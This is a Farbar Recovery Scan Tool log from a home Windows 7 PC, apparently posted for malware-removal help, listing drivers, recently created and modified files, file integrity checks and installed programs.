R3 NAVENG; C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\VirusDefs\20140523.017\ENG64.SYS [126040 2014-04-20] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\VirusDefs\20140523.017\EX64.SYS [2099288 2014-04-20] (Symantec Corporation)
R3 SRTSP; C:\Windows\System32\Drivers\NISx64\1503000.00C\SRTSP64.SYS [875736 2014-02-13] (Symantec Corporation)
R3 SRTSPX; C:\Windows\system32\drivers\NISx64\1503000.00C\SRTSPX64.SYS [36952 2013-09-10] (Symantec Corporation)
R3 SymDS; C:\Windows\system32\drivers\NISx64\1503000.00C\SYMDS64.SYS [493656 2013-09-10] (Symantec Corporation)
R3 SymEFA; C:\Windows\system32\drivers\NISx64\1503000.00C\SYMEFA64.SYS [1148120 2014-03-04] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2013-11-23] (Symantec Corporation)
R3 SymIRON; C:\Windows\system32\drivers\NISx64\1503000.00C\Ironx64.SYS [264280 2013-09-27] (Symantec Corporation)
R3 SymNetS; C:\Windows\System32\Drivers\NISx64\1503000.00C\SYMNETS.SYS [593112 2014-02-18] (Symantec Corporation)
==================== NetSvcs (Whitelisted) ===================

==================== One Month Created Files and Folders ========
2014-05-25 07:19 - 2014-05-25 07:19 - 00002606 _____ () C:\Users\Hewlett Packard\Desktop\Rkill.txt
2014-05-25 07:01 - 2014-05-25 07:01 - 00037285 _____ () C:\Users\Hewlett Packard\Downloads\Addition.txt
2014-05-25 07:00 - 2014-05-25 07:36 - 00026828 _____ () C:\Users\Hewlett Packard\Downloads\FRST.txt
2014-05-25 06:57 - 2014-05-25 07:22 - 00000000 ____D () C:\AdwCleaner
2014-05-25 06:57 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-05-25 06:56 - 2014-05-25 07:36 - 00000000 ____D () C:\FRST
2014-05-25 06:55 - 2014-05-25 06:55 - 01940216 _____ (Bleeping Computer, LLC) C:\Users\Hewlett Packard\Downloads\rkill.exe
2014-05-25 06:52 - 2014-05-25 06:52 - 01326389 _____ () C:\Users\Hewlett Packard\Downloads\AdwCleaner.exe
2014-05-25 06:48 - 2014-05-25 06:48 - 02066432 _____ (Farbar) C:\Users\Hewlett Packard\Downloads\FRST64.exe
2014-05-25 05:46 - 2014-05-25 07:11 - 00001154 _____ () C:\Windows\PFRO.log
2014-05-25 05:46 - 2014-05-25 07:11 - 00000224 _____ () C:\Windows\setupact.log
2014-05-25 05:46 - 2014-05-25 05:46 - 00000000 ____D () C:\NPE
2014-05-25 05:46 - 2014-05-25 05:46 - 00000000 _____ () C:\Windows\setuperr.log
2014-05-25 05:44 - 2014-05-25 05:49 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\NPE
2014-05-25 05:36 - 2014-05-25 05:45 - 00000000 ____D () C:\3590F75ABA9E485486C100C1A9D4FF06Z...ZZ.ZZ....ZZZ
2014-05-25 05:14 - 2014-05-25 05:14 - 00041926 _____ () C:\Users\Hewlett Packard\Documents\cc_20140525_051401.reg
2014-05-25 04:13 - 2014-05-25 07:32 - 00003702 _____ () C:\Windows\System32\Tasks\RegWrite
2014-05-24 14:02 - 2014-05-24 14:02 - 00001137 _____ () C:\Users\Public\Desktop\Yahoo! Messenger.lnk
2014-05-24 14:02 - 2014-05-24 14:02 - 00000000 ____D () C:\ProgramData\Yahoo! Companion
2014-05-24 14:02 - 2014-05-24 14:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Yahoo! Messenger
2014-05-23 18:58 - 2014-05-23 19:22 - 17917592 _____ () C:\Users\Hewlett Packard\Desktop\Overall Presentation - Retirement.pptx
2014-05-23 18:57 - 2014-05-23 19:09 - 09242974 _____ () C:\Users\Hewlett Packard\Desktop\Overall Presentation - Prospective Properties.pptx
2014-05-21 08:30 - 2014-05-21 08:30 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Blue Jeans
2014-05-20 23:55 - 2014-05-20 23:55 - 00001289 _____ () C:\Users\Public\Desktop\YTD Video Downloader.lnk
2014-05-20 23:55 - 2014-05-20 23:55 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\YTD Video Downloader
2014-05-17 03:14 - 2014-05-06 12:40 - 23544320 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-05-17 03:14 - 2014-05-06 12:17 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-05-17 03:14 - 2014-05-06 11:25 - 17382912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-05-17 03:14 - 2014-05-06 11:07 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-05-17 03:14 - 2014-05-06 11:00 - 00084992 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-05-17 03:14 - 2014-05-06 10:10 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-05-16 23:20 - 2014-05-16 23:20 - 00000000 ____D () C:\Windows\System32\Tasks\Norton Internet Security
2014-05-15 15:04 - 2014-05-09 14:14 - 00477184 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-05-15 15:04 - 2014-05-09 14:11 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-05-15 15:04 - 2014-04-12 10:22 - 00155072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2014-05-15 15:04 - 2014-04-12 10:22 - 00095680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2014-05-15 15:04 - 2014-04-12 10:19 - 01460736 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-05-15 15:04 - 2014-04-12 10:19 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2014-05-15 15:04 - 2014-04-12 10:19 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2014-05-15 15:04 - 2014-04-12 10:19 - 00029184 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2014-05-15 15:04 - 2014-04-12 10:19 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2014-05-15 15:04 - 2014-04-12 10:12 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2014-05-15 15:04 - 2014-04-12 10:10 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2014-05-15 15:04 - 2014-03-25 10:43 - 14175744 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2014-05-15 15:04 - 2014-03-25 10:09 - 12874240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2014-05-15 15:04 - 2014-03-04 17:47 - 05550016 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-05-15 15:04 - 2014-03-04 17:44 - 00728064 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00722944 _____ (Microsoft Corporation) C:\Windows\system32\objsel.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00424960 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00340992 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00314880 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\wincredprovider.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-05-15 15:04 - 2014-03-04 17:43 - 00057344 _____ (Microsoft Corporation) C:\Windows\system32\cngprovider.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\adprovider.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\capiprovider.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00052736 _____ (Microsoft Corporation) C:\Windows\system32\dpapiprovider.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00044544 _____ (Microsoft Corporation) C:\Windows\system32\dimsroam.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-05-15 15:04 - 2014-03-04 17:20 - 03969984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-05-15 15:04 - 2014-03-04 17:20 - 03914176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-05-15 15:04 - 2014-03-04 17:17 - 00550912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00538112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\objsel.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00247808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cngprovider.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00049664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adprovider.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00048128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\capiprovider.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpapiprovider.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00036864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dimsroam.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wincredprovider.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-05-15 15:04 - 2014-03-04 17:16 - 00274944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2014-05-09 15:35 - 2014-05-09 15:35 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Oracle
2014-05-09 15:35 - 2014-05-09 15:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-05-07 09:22 - 2014-05-17 03:31 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-05-07 09:22 - 2014-05-07 09:22 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\DropboxMaster
2014-05-05 16:55 - 2014-05-05 16:55 - 00000031 _____ () C:\Users\Hewlett Packard\Desktop\dvr password.txt
2014-05-05 16:50 - 2014-05-05 16:52 - 00000000 ____D () C:\Program Files (x86)\DVRClient Plug-in
2014-05-05 16:50 - 2014-05-05 16:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DVRClient Plug-in
2014-04-30 14:34 - 2014-04-30 14:34 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\Shinryo - MTR
2014-04-29 10:29 - 2014-05-20 09:28 - 00003662 _____ () C:\Windows\System32\Tasks\DTChk
2014-04-29 10:29 - 2014-05-20 09:28 - 00000000 ____D () C:\Users\Public\Util
==================== One Month Modified Files and Folders =======
2014-05-25 07:36 - 2014-05-25 07:00 - 00026828 _____ () C:\Users\Hewlett Packard\Downloads\FRST.txt
2014-05-25 07:36 - 2014-05-25 06:56 - 00000000 ____D () C:\FRST
2014-05-25 07:32 - 2014-05-25 04:13 - 00003702 _____ () C:\Windows\System32\Tasks\RegWrite
2014-05-25 07:29 - 2013-05-31 13:28 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-05-25 07:26 - 2013-10-11 08:23 - 01485118 _____ () C:\Windows\WindowsUpdate.log
2014-05-25 07:22 - 2014-05-25 06:57 - 00000000 ____D () C:\AdwCleaner
2014-05-25 07:21 - 2013-08-14 18:28 - 00000372 _____ () C:\Windows\Tasks\HPCeeScheduleForHewlett Packard.job
2014-05-25 07:19 - 2014-05-25 07:19 - 00002606 _____ () C:\Users\Hewlett Packard\Desktop\Rkill.txt
2014-05-25 07:18 - 2009-07-14 12:45 - 00032064 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-05-25 07:18 - 2009-07-14 12:45 - 00032064 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-05-25 07:15 - 2009-07-14 13:13 - 00783400 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-05-25 07:12 - 2013-06-04 13:38 - 00000000 ___RD () C:\Users\Hewlett Packard\Dropbox
2014-05-25 07:12 - 2013-06-04 13:30 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Dropbox
2014-05-25 07:11 - 2014-05-25 05:46 - 00001154 _____ () C:\Windows\PFRO.log
2014-05-25 07:11 - 2014-05-25 05:46 - 00000224 _____ () C:\Windows\setupact.log
2014-05-25 07:11 - 2013-11-25 12:31 - 00000912 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-05-25 07:11 - 2009-07-14 13:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-05-25 07:01 - 2014-05-25 07:01 - 00037285 _____ () C:\Users\Hewlett Packard\Downloads\Addition.txt
2014-05-25 06:55 - 2014-05-25 06:55 - 01940216 _____ (Bleeping Computer, LLC) C:\Users\Hewlett Packard\Downloads\rkill.exe
2014-05-25 06:52 - 2014-05-25 06:52 - 01326389 _____ () C:\Users\Hewlett Packard\Downloads\AdwCleaner.exe
2014-05-25 06:48 - 2014-05-25 06:48 - 02066432 _____ (Farbar) C:\Users\Hewlett Packard\Downloads\FRST64.exe
2014-05-25 06:41 - 2013-11-25 12:31 - 00000916 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-05-25 06:15 - 2013-05-13 14:14 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Skype
2014-05-25 06:11 - 2013-05-07 15:40 - 00000000 ____D () C:\Users\Hewlett Packard
2014-05-25 06:05 - 2013-05-31 13:28 - 00692400 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-05-25 06:05 - 2013-05-31 13:28 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-05-25 06:05 - 2011-11-10 07:56 - 00070832 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-05-25 06:03 - 2013-06-04 13:41 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\Adobe
2014-05-25 06:02 - 2009-07-14 11:20 - 00000000 ____D () C:\Windows\system32\NDF
2014-05-25 05:53 - 2014-01-15 00:02 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\Deployment
2014-05-25 05:49 - 2014-05-25 05:44 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\NPE
2014-05-25 05:46 - 2014-05-25 05:46 - 00000000 ____D () C:\NPE
2014-05-25 05:46 - 2014-05-25 05:46 - 00000000 _____ () C:\Windows\setuperr.log
2014-05-25 05:45 - 2014-05-25 05:36 - 00000000 ____D () C:\3590F75ABA9E485486C100C1A9D4FF06Z...ZZ.ZZ....ZZZ
2014-05-25 05:45 - 2012-04-06 01:53 - 00000000 ____D () C:\ProgramData\Norton
2014-05-25 05:14 - 2014-05-25 05:14 - 00041926 _____ () C:\Users\Hewlett Packard\Documents\cc_20140525_051401.reg
2014-05-25 04:50 - 2013-10-31 21:39 - 00000000 ____D () C:\Users\Hewlett Packard\Documents\Outlook Files
2014-05-25 03:27 - 2013-12-02 03:31 - 00000258 __RSH () C:\Users\Hewlett Packard\ntuser.pol
2014-05-24 21:19 - 2013-05-07 15:41 - 00003990 _____ () C:\Windows\System32\Tasks\User_Feed_Synchronization-{D38877BA-A6DE-4B41-8821-353EF4B824FB}
2014-05-24 15:46 - 2013-12-03 10:18 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\CrashDumps
2014-05-24 14:55 - 2013-09-23 13:55 - 00000000 ____D () C:\Program Files\CCleaner
2014-05-24 14:02 - 2014-05-24 14:02 - 00001137 _____ () C:\Users\Public\Desktop\Yahoo! Messenger.lnk
2014-05-24 14:02 - 2014-05-24 14:02 - 00000000 ____D () C:\ProgramData\Yahoo! Companion
2014-05-24 14:02 - 2014-05-24 14:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Yahoo! Messenger
2014-05-24 14:02 - 2014-01-04 13:01 - 00000000 ____D () C:\ProgramData\Yahoo!
2014-05-24 14:02 - 2014-01-04 12:57 - 00000000 ____D () C:\Program Files (x86)\Yahoo!
2014-05-24 14:02 - 2013-06-14 19:46 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Yahoo!
2014-05-23 19:22 - 2014-05-23 18:58 - 17917592 _____ () C:\Users\Hewlett Packard\Desktop\Overall Presentation - Retirement.pptx
2014-05-23 19:09 - 2014-05-23 18:57 - 09242974 _____ () C:\Users\Hewlett Packard\Desktop\Overall Presentation - Prospective Properties.pptx
2014-05-23 12:48 - 2013-11-25 12:33 - 00002183 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-05-21 09:06 - 2013-05-07 15:45 - 00000000 ____D () C:\Users\Hewlett Packard\Documents\Youcam
2014-05-21 08:30 - 2014-05-21 08:30 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Blue Jeans
2014-05-21 07:21 - 2013-08-14 18:28 - 00003246 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForHewlett Packard
2014-05-21 07:21 - 2013-06-05 07:48 - 00000000 _____ () C:\Windows\system32\HP_ActiveX_Patch_NOT_DETECTED.txt
2014-05-21 07:21 - 2013-05-08 11:19 - 00000052 _____ () C:\Windows\SysWOW64\DOErrors.log
2014-05-20 23:56 - 2013-11-03 11:23 - 00000000 ____D () C:\ProgramData\YTD Video Downloader
2014-05-20 23:55 - 2014-05-20 23:55 - 00001289 _____ () C:\Users\Public\Desktop\YTD Video Downloader.lnk
2014-05-20 23:55 - 2014-05-20 23:55 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\YTD Video Downloader
2014-05-20 09:28 - 2014-04-29 10:29 - 00003662 _____ () C:\Windows\System32\Tasks\DTChk
2014-05-20 09:28 - 2014-04-29 10:29 - 00000000 ____D () C:\Users\Public\Util
2014-05-20 00:56 - 2013-12-30 05:17 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\Personal 2014
2014-05-17 07:15 - 2013-05-07 15:41 - 00000000 ___RD () C:\Users\Hewlett Packard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-05-17 07:15 - 2013-05-07 15:41 - 00000000 ___RD () C:\Users\Hewlett Packard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools
2014-05-17 03:31 - 2014-05-07 09:22 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-05-17 03:15 - 2013-05-13 14:23 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-05-17 03:07 - 2013-08-14 18:03 - 00000000 ____D () C:\Windows\system32\MRT
2014-05-17 03:03 - 2013-05-08 11:23 - 93223848 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-05-16 23:20 - 2014-05-16 23:20 - 00000000 ____D () C:\Windows\System32\Tasks\Norton Internet Security
2014-05-16 23:18 - 2014-01-17 11:42 - 00002019 _____ () C:\Users\Public\Desktop\Adobe Reader X.lnk
2014-05-16 23:18 - 2011-11-10 08:07 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader X.lnk
2014-05-16 23:15 - 2013-11-25 12:17 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Internet Security
2014-05-16 23:15 - 2013-05-07 15:41 - 00002501 _____ () C:\Users\Public\Desktop\Norton Internet Security.lnk
2014-05-16 23:15 - 2012-04-06 01:53 - 00003234 _____ () C:\Windows\System32\Tasks\Norton WSC Integration
2014-05-16 23:15 - 2012-04-06 01:53 - 00000000 ____D () C:\Windows\system32\Drivers\NISx64
2014-05-16 11:36 - 2013-06-04 13:35 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2014-05-11 11:36 - 2013-11-25 12:31 - 00003912 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-05-11 11:36 - 2013-11-25 12:31 - 00003660 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-05-09 15:35 - 2014-05-09 15:35 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Oracle
2014-05-09 15:35 - 2014-05-09 15:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-05-09 15:35 - 2013-10-22 10:14 - 00000000 ____D () C:\ProgramData\Oracle
2014-05-09 15:35 - 2013-09-05 18:21 - 00000000 ____D () C:\Program Files (x86)\Java
2014-05-09 14:14 - 2014-05-15 15:04 - 00477184 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-05-09 14:11 - 2014-05-15 15:04 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-05-07 22:56 - 2013-10-09 17:56 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\Aeden
2014-05-07 09:22 - 2014-05-07 09:22 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\DropboxMaster
2014-05-06 12:40 - 2014-05-17 03:14 - 23544320 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-05-06 12:17 - 2014-05-17 03:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-05-06 11:25 - 2014-05-17 03:14 - 17382912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-05-06 11:07 - 2014-05-17 03:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-05-06 11:00 - 2014-05-17 03:14 - 00084992 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-05-06 10:10 - 2014-05-17 03:14 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-05-05 16:55 - 2014-05-05 16:55 - 00000031 _____ () C:\Users\Hewlett Packard\Desktop\dvr password.txt
2014-05-05 16:52 - 2014-05-05 16:50 - 00000000 ____D () C:\Program Files (x86)\DVRClient Plug-in
2014-05-05 16:50 - 2014-05-05 16:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DVRClient Plug-in
2014-04-30 14:34 - 2014-04-30 14:34 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\Shinryo - MTR
2014-04-25 21:07 - 2014-02-03 14:30 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\Dusit Signage Package
2014-04-25 10:14 - 2013-08-14 20:14 - 00000000 ___RD () C:\Program Files (x86)\Skype
2014-04-25 09:18 - 2014-04-23 09:28 - 00000000 ____D () C:\Users\dub_cm_auto
Some content of TEMP:
====================
C:\Users\Hewlett Packard\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpcin9yk.dll

==================== Bamital & volsnap Check =================
C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit

LastRegBack: 2014-05-19 10:35
==================== End Of Log ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 24-05-2014 1
Ran by Hewlett Packard at 2014-05-25 07:36:26
Running from C:\Users\Hewlett Packard\Downloads
Boot Mode: Normal
==========================================================

==================== Security Center ========================
AV: Norton Internet Security (Enabled - Up to date) {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
AS: Norton Internet Security (Enabled - Up to date) {631E4324-D31C-783F-EC5C-35AD42B18466}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Norton Internet Security (Enabled) {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}
==================== Installed Programs ======================
Adobe Flash Player 13 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 13.0.0.214 - Adobe Systems Incorporated)
Adobe Reader X (10.1.10) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.10 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.6 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.6.1.629 - Adobe Systems, Inc.)
AuthenTec TrueAPI (Version: 1.3.0.144 - AuthenTec, Inc.) Hidden
Bejeweled 3 (x32 Version: 2.2.0.97 - WildTangent) Hidden
bjnplugin (HKLM-x32\...\{0739BA9B-B652-400A-AEAF-A0A603B42849}) (Version: 2.6.118.8 - Blue Jeans)
Blackhawk Striker 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Broadcom 802.11 Wireless LAN Adapter (HKLM\...\Broadcom 802.11 Wireless LAN Adapter) (Version: - Broadcom Corporation)
Broadcom Bluetooth Software (HKLM\...\{6E7F4CA3-B2DE-413C-A7A1-43AA5BE19EA1}) (Version: 6.5.0.2300 - Broadcom Corporation)
Broadcom InConcert Maestro (HKLM\...\{57DD35E9-D9BB-4089-BB05-EF933C586CB3}) (Version: 1.0.5.2300 - Broadcom Corporation)
CCleaner (HKLM\...\CCleaner) (Version: 4.14 - Piriform)
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Cradle of Rome 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.5.0.4606 - CyberLink Corp.)
CyberLink YouCam (x32 Version: 3.5.0.4606 - CyberLink Corp.) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{349F73CA-653A-43A6-AE77-970B07D6EDA0}) (Version: - Microsoft)
Dora's World Adventure (x32 Version: 2.2.0.95 - WildTangent) Hidden
Dropbox (HKCU\...\Dropbox) (Version: 2.6.33 - Dropbox, Inc.)
DVRClientPlugin 1.3 (HKLM-x32\...\DVRClientPlugin) (Version: 1.3 - )
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version: - )
ESU for Microsoft Windows 7 SP1 (HKLM-x32\...\{E1311ACE-E2BB-41BC-A02C-7256E11E3A33}) (Version: 3.1.4 - Hewlett-Packard)
Evernote v. 4.2.3 (HKLM-x32\...\{F761359C-9CED-45AE-9A51-9D6605CD55C4}) (Version: 4.2.3.22 - Evernote Corp.)
Farm Frenzy (x32 Version: 2.2.0.98 - WildTangent) Hidden
Farmscapes (x32 Version: 2.2.0.98 - WildTangent) Hidden
FATE (x32 Version: 2.2.0.97 - WildTangent) Hidden
Final Drive Fury (x32 Version: 2.2.0.95 - WildTangent) Hidden
Fresco Logic USB3.0 Host Controller (HKLM\...\{95CB030D-1F2B-43F8-990D-C98837713164}) (Version: 3.5.93.0 - Fresco Logic Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 35.0.1916.114 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.24.7 - Google Inc.) Hidden
Hewlett-Packard ACLM.NET v1.2.1.1 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
Hightail for Outlook 3.1.0.2128 (HKLM\...\{32DC76CA-13F7-4DE8-89BB-3F84E8EBA5C4}) (Version: 3.10.2128 - Hightail)
